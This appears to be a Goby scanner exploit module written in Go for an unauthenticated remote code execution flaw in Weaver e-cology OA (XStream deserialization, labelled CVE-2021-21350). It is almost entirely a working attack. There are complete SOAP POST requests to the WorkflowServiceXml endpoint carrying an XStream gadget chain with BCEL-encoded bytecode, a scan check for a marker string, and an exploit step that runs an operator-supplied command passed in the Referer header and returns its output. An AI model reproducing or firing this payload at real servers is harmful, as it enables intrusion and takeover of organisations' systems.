Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Weaver e_cology OA XStream Remote Code Execution",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统存在远程代码执行漏洞。该漏洞存在于泛微协同管理应用平台OA系统的BeanShell组件中,该组件为系统自带且允许未授权访问。攻击者通过调用BeanShell组件的问题接口可直接在目标服务器上执行任意命令。",
"Product": "Weaver e-cology",
"Homepage": "https://www.weaver.com.cn/e9",
"Author": "flystart",
"Impact": "<p>攻击者可利用此漏洞造成远程代码执行<br></p>",
"Recommandation": "<p>官方已发布针对此漏洞的修复补丁,受影响用户也可采取下列防护措施对此漏洞进行临时防护。</p>",
"References": [
"https://mp.weixin.qq.com/s/YcCydpGNiCrB0F_w6D5eRw"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami"
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/services%20/WorkflowServiceXml",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
"Content-Type": "text/xml;charset=UTF-8"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n <soapenv:Header/>\n <soapenv:Body>\n <web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$G$S$ced$Y$E$83$5cF$ad$a2$z$gT$aei$C$Ek$8d$40$wm$40$rT$8b$da$daar$m$Da$s$ceL$80$5e$ed$fd$7e$b1$7d$b3$7f$c0$d7$f6et$b5$ab$5d$7d$f6$a5k$b5$P$ed$af$a9$ddg$S$94$I$ad$85$b5$f6$9c$7d$fb$ce$be$9c$b3O$ee$fd$fd$e3$_$A$9e$c6$b7$K$o$YQ0$8a$94$mc2N$wx$G$a7d$3c$cbpZ$BC$9a$e1$8c$82qL$I$cbI$n$c9$c8xN$7c$cf$w$98$c2$f3$82$bc$m$p$cb0$zcFA$U$e7d$9cg$b8$mcVFNA$3b$e6$Y$5eTp$R$97$E$f3$92X$cd$x$b8$8c$x$K$f6$e2$aa$8c$97$c5$f7$VA$ae$J$f2$aa$M$9daAA7$M$86$bc$84$86$93$a6ez$a7$q$d4$c7z$$J$I$8d$dby$$$a19kZ$7c$a6$bc$ba$c0$9d9$7d$a1H$92$a6$9c$a7$h$x$d3z$v$e0$c9$952$60$a0$c5$Z$86E$K$8fb$a2$40$IZ$82$92$b3$cb$8e$c13$a6$f0$8bL$ae$e9$c5$bee$7dMW$RC$P$c3$92$8a$CL$V$cbX$91p$d4$b0W$fb$M$bdl$U$ec$3e$8b$7b$eb$b6$b3$d2W4$5d$8f$5b$7dsF$vg$h$x$dc$a3PV$Y$8a$wVaI$d8$bd$c4$bd$f1$b2$e3p$cb$9b$e5$d7$cb$dc$f5$uZ$B$df_$d4$ad$a5$fe$f1$a2$ee$ba$wl$94$q$b4$3c$U$9f$5bX$e6$86G$f1$aa$b8$OG$85$LOE$Z$c2$f7$9a$c3$dd$92m$b9$3c$a3$hz$9e$M$d6$b0N$v$a9$d8$c0k$w$5e$c7$h$94$D$edy$c91$3d$eeH$d8$V$80$9av$ff$a6$a0$x94$9a$i$9aH$a7$T$89$c1$d1$91$c9$c1d$3c$93$i$l$8fg$86$t$e3$99$c1tb$m$a1$e2M$bcU$B9$cbi$H$a7$s$b2$9c$e7$98$d6$92$E6$cb$X$b9$T$A$s$8c$RC$8f$8f$M$e9$7cX$l$k$d0$e3F$o$c9$87$f3I$p$b1$98L$O$c4$f3$86$8a$b7q$83$w$R$80$94$3d$b3$d8$9f3t$cb$e2$O$c3$3b$w$de$c5$7b$w$de$c7$H$w$3e$c4G$M$l$ab$f8$E$9f$8a$da$7f$s$a1$eejZ$c5$e7$f8B$c5$97$f8J$c5$d7$b8$v$B$SZ$l$863$b9a$f0$92g$da$96$8ao$d0C$e7A$b4OB$e7C$L$87$_$W$a9$96$fd$d3$dc$x$d8t$80$3a$b6$ab2$s$_$e6k$b2$9c$x8$94$3a$9d$o$a3$d2$baM$7eO$ac$t$fb$a8$d5$98$846$d1d$db$f2$f8$86$X44kW$ea$a6$d5$98oQ$J$9f$j$VT$f7$o$z$C$89$84$eeX$f6$d1$ca$8fmC$i$ab$f4j3$bf$d3$3b$f8$5c$d9$e6$b3$V$a5$b6B$E$d7$60Zk$f6$K$5d$86$d1$adX$953Y$83U$V$f5l$XI$90EM$wi$b4n$_$D$Z4$91A$ae$5c$e2$8eQ$b1j$n$7e$82$T$e3$f0$7c$b5$p$bd$8f$c9$bf$a6$81$C$d2$e5$5e$da0$b8$eb$9a$c1$Q$I$c5$$$8b$nQO$c8$S$8e$ec$90$cc$8e$91$87$d7$c5U$a1$O$ed$b4$3b$c1$v$ae$a7$3b$9e$7b$c9$f4$K$ffbty$f3$b4$H$d2$d9$b2$e5$99$ab$E$a8P$i$P$98$b6$9a$a2T$c5$a2$97ny$c1$ad$5e$b2$b6$d8T$cfvx$ca$8bop$83$a6$d
1c$cas$de$b1E$z$c6j$a2$a9$Ki2P4SV$a9$ec$91$t$d7W$e9flFD$d3b$8b$82$dc$3bc$3b$wD1$d4$b2$cb$tx$d1$5c$adL$97$ff$Ii$eb$cd$tLV$d0$dd$Z$ba0$c1$q$a7$82$85$ac$80$a9$bda$P2n$$$d1$c2$Lf$fa$9c$a3$h$i$87p$94$9e$m$f1$t$d1$3fMj$a2$c7$88$f9$k$Nh$q$e9_$c7$ee$40$ba$8b$3a$l$f5$d1$90$8fp$f6x$b4$a1$feg0$l$f2$f4$J$89V$R$l$caL$af$8fF$lj$b4$c9$c7$aeTH$L$91e$b3$W$oiK$w$ac$85I$Z$dd$5duJ5h$NZ$b8$ea$f7$x$a2$v$a6$b1h$ab$8f$3d$C$o$da$W$o$ab$f9$fah$7bN$98$ca$9a$dcK$82$I$J$3ar$81y$7b$w$a2E$a2$9d$3e$b4$5b$Y$f9$J$7b$e7$efb$9f$Wi$e9$f2$b1$df$c7$T$3e$O$dc$c1$c1$uq$87R$8a$c64$c5$c7$e1$5bh$U$df$to$p$i$7d$8a$b6$b9$N9$7b$dc$c7$91$l$u$cf$Q$7e$c3$ef$f4$o$d6$e18e$3a$83V$a2$wIw$a1$F$cd$d8G$b4$h$bb$R$a7$d7w$94ti$ec$c1$F$b4A$a7$f7$b6$80$O$9a$ee$9d$b8$J$N$df$91$e5$5d$ec$t$ac$$B$3b$80$3fp$Q$7f$e20N$Q$da2$c2$f7q$P$8d$M$bd$M$7d$M$fd$M$D$M$83$B$a5$f5P$40$e3$8c$7e3H$c4$dd$a7$98$fe$87i$5d$c0$c5$efS$dc$e4$d5$L$f1$U$tB$e4$9b$a4$j$eb0$fc$P$y$j$c8$d7$88$I$A$A
</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                    </key>
                  </defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
        <java.util.Collections_-SynchronizedCollection>
          <default>
            <c class="set"></c>
            <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
          </default>
        </java.util.Collections_-SynchronizedCollection>
      </domains>                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue></web:string>\n <web:string>2</web:string>\n </web:doCreateWorkflowRequest>\n </soapenv:Body>\n</soapenv:Envelope>\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "62962DAA55198E163F6CC3F7E3F1A505",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/services%20/WorkflowServiceXml",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
"Content-Type": "text/xml;charset=UTF-8",
"Referer": "5c8ca382ae7a70a3c56e7d6c5f6603dc{{{cmd}}}"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n <soapenv:Header/>\n <soapenv:Body>\n <web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dU$ebS$TW$U$ff$z$q$dc$cd$b2$I$E$Q$a2U$b1$z$g$E$S$K$f2$K$d6$8a$3c$w6$m$rT$Em$ed$b2$b9$c0B$d8$8d$fb$A$fa$7e$bf$9f3$fd$e4$l$d0$f1$b3_V$a7$9dv$3a$d3$_N$db$P$ed$3fTz$ee$s$I1$b46$99$b9$7b$cf$f3$fe$ce9$f7$9c$fb$db$df$3f$fc$M$e0$y$beU$Q$c1$80$82A$M$89$r$rcX$c19$3c$x$e3$3c$c3s$K$Y$$0$8c$u$b8$88Q$a19$s8$e32$s$c4$f7y$F$970$v$96$cb2$5e$60H$cb$98b$98$96qE$c6$8c$82F$bc$c80$ab$m$839A$bc$qvW$V$cc$e3$9a$82$W$y$c8X$U$df$ebb$b9$n$96$97e$bc$a2$m$8a$9b$M$af$wx$g$g$c3$92$84$aas$86i$b8$e7$rT$c6$db$afJ$I$8dZY$$$a16m$98$7c$da$dbX$e2$f6$9c$b6$94$pNM$c6$d5$f4$f5$v$z$l$d0dJ$f0$Zt$C$cf$90$rl$E$8c$d0$90k$JJ$c6$f2l$9dO$Y$c2N$k$bf6$93X$d365$V$a7$Rg$e0$w$96$b1$a2b$V$86$84$d3$ba$b5$91$d05O_$b5$S$sw$b7$y$7b$3d$913$i$97$9b$899$3d$9f$b1$f4u$ee$S$92u$865$V$eb$c8I$a8_$e1$ee$a8g$db$dctg$f9$z$8f$3b$$$81$V$ee$939$cd$5cI$8e$e64$c7Q$b1$BSB$dd$k$fb$ca$d2$g$d7$5d$82$ab$c2B$5e$c5$z$d8$w$i$d8d$7b$d3$e6N$de2$j$3e$a1$e9Z$96$d0$b9$f0$u$o$V$9b$d8R$b1$8d$d7$qD$e8$ccy$dbp9$e9$l$K$9c$gVr$97$n$84$978Y$da$r$tf$5c$db0W$q$b0Y$be$ccm$nl$ed$d3$Hu$adw$b0G$e3$D$da$40$b7$d6$ab$f7$f5$f3$81l$bf$de$b7$dc$df$df$dd$9b$rl$af$e3$N$8a0p$e2$b9F$$$99$d15$d3$e46$c3$9b$w$de$c2$db$w$de$c1$bb$w$de$c3$fb$M$l$a8$f8$Q$l$89$9c$7e$y$a1$e2$c6$88$8aO$f0$a9$8a$cf$f0$b9$8a$_$f0$a5$E$a8$f8$K_Kh$d8$c34$be$ad$f3$bckX$a6$8ao$Q$a7$8aSi$q$b4$ec$v$d8$7c9GyJNqw$d5$caJh$$$XM$Y$3c$97$z$89tn$d5$a6$f0$e9$82$e8$85$b2$ec$d2$8d$f1$f6$f4$a3Z$c3$S$9aD$B$z$d3$e5$dbnP$ac$b4U$c8$5d$acD$7d$9fH$d8$i$u$a0$dc$e7h$Tp$q$b4$c5$d3$8ff$7f$b8$cc$e3p$a1$5e$bb$f1$5d8$c0$e6z$99$cd$7e$_$a5$Z$owU$86$b9i$ad$d3$3d$l$da$ef$abp$dfJ$7c$VY$ed$e5$y$ea$R$91$93B$Y$N$e5i$m$85$gR$c8xyn$eb$F$ad$3a$a2$c78$R6$cf$W$x$d2$f5$98$f8K$K$u$5c$3a$dc$j$d1u$ee8F$d0$df$a1$f8$a2$e8$ffJ$f2$y$e1$d4$B$c1$i$88$5cq$5c$cdv$9dy$c3$5d$a52$j$Eaq$f7F$H$dcY$cft$8d$N$3aN$a1s$k$SM$rA$X$d9$a2V$8e$b7$e4$U$h$a9$v$3e$d9$5e$ee$9ep$f3m$ae$d3$qyL$f83$b6$rb$j$$ASdRW$T$9aI3$ef$b9d$c9$b5$N$ba$f9$bb$88$a8$d3$f7$J$c8$bc$r$7e$a0$40$e4N$f5$i$3e$c6s$c6Fa2$fc$H$a4$fd$ddM$3e$d9$aa
$e6LSC$EC$98$S$W2$D$a2$b4$83$kF$i$de$S$a3$e7_$d2M0j$f3$b4u$83q$3dgk$3a$c7I$9c$a2$a7E$fc$q$fa$d3$U$a6$b5$9d$88$efQ$85j$e2$feu$e6$k$a4$fb$a8$f0Q$Z$N$f9$I$a7$3b$a2U$95$3f$81$f9$90$a7$3a$r$daE$7c$u$d3$5d$3e$aa$7d$a8$d1$g$l$87R$a1X$884kc$n$e2$d6$a5$c2$b10$J$a3$f5E$a3TU$ac$w$W$$$da$fd$82h$8a$J$dbhC$88$c4$L$95$d1$c6$8c$d0$91cr$X1$o$c4h$ca$Ez$8d$a9H$y$S$3d$ec$a3$f96$G$7fD$cb$c2$7d$c4b$91$baV$lG$7c$i$f5$f1$c4$3d$i$8b$k$f7q$o$a5$c4XL$f1$d1z$h$d5$e2$7b$f2$O$c2$d1$t$7d$3cu$Hr$ba$c3G$db$5d$K0$84$H$f8$9d$5e$b9$K$9c$a1$Q$_$d3$bb$tFb$I$87P$87Z$i$a5$b5$N$f5$e8$r$fe$Q$g0$o$5eS4A$c3axh$a69$da$82$efp$EwI$f3$BN$90$a7c$f8$D$c7$f1$t$r$b3$83$3c$ad$n$bc$83_Q$cd$d0$c9$d0$c5$90$60H2t$H$x$ed$9f$J$d6$kF$fe$r$a2v$I$cf$ffP$ad$I$a8$9e$j$c2LV$9d$c0E$86$b3$n$b2$ed$a3$T$x$d0$ff$P$ca$d2$a5$5eU$I$A$A
</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                    </key>
                  </defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
        <java.util.Collections_-SynchronizedCollection>
          <default>
            <c class="set"></c>
            <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
          </default>
        </java.util.Collections_-SynchronizedCollection>
      </domains>                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue></web:string>\n <web:string>2</web:string>\n </web:doCreateWorkflowRequest>\n </soapenv:Body>\n</soapenv:Envelope>\n"
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-05-21 22:24:07",
"GobyVersion": "1.8.275",
"ExpTips": {
"Type": "",
"Content": ""
},
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"DisclosureDate": "2021-05-22"
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}